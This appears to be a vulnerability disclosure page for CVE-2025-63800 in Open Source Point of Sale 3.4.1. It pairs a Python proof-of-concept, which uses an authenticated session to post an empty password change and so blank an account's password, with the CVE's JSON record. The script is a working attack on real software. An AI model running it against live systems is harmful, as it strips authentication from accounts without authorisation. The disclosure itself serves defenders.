CVE-2025-63800

import requests import json # CVE-2025-63800 PoC - Open Source Point of Sale Empty Password Vulnerability # Target: Open Source Point of Sale 3.4.1 # Description: Password change endpoint allows setting empty password target_url = "http://target.com/opensourcepos" # Replace with actual session cookie after authentication session_cookie = {"ci_session": "your_session_cookie_here"} # Endpoint for password change password_change_endpoint = f"{target_url}/index.php/login/change_password" # PoC payload - sending empty password payload = { "password": "", "repeat_password": "" } headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": f"ci_session={session_cookie['ci_session']}" } print("[*] Sending empty password change request...") response = requests.post(password_change_endpoint, data=payload, headers=headers) if response.status_code == 200: print("[+] Password changed to empty string successfully!") print("[+] You can now login with empty password") else: print("[-] Attack failed, check credentials or target URL")

{"cve": {"id": "CVE-2025-63800", "sourceIdentifier": "[email protected]", "published": "2025-11-18T16:15:46.310", "lastModified": "2025-12-19T16:51:22.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The password change endpoint in Open Source Point of Sale 3.4.1 allows users to set their account password to an empty string due to missing server-side validation. When an authenticated user omits or leaves the `password` and `repeat_password` parameters empty in the password change request, the backend still returns a successful response and sets the password to an empty string. This effectively disables authentication and may allow unauthorized access to user or administrative accounts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-521"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensourcepos:open_source_point_of_sale:3.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "8EC6C4DB-C7B4-46A5-9479-851918C55014"}]}]}], "references": [{"url": "https://github.com/omkaryepre/vulnerability-research/tree/main/CVE-2025-63800", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/opensourcepos/opensourcepos", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://opensourcepos.org/", "source": "[email protected]", "tags": ["Product"]}]}}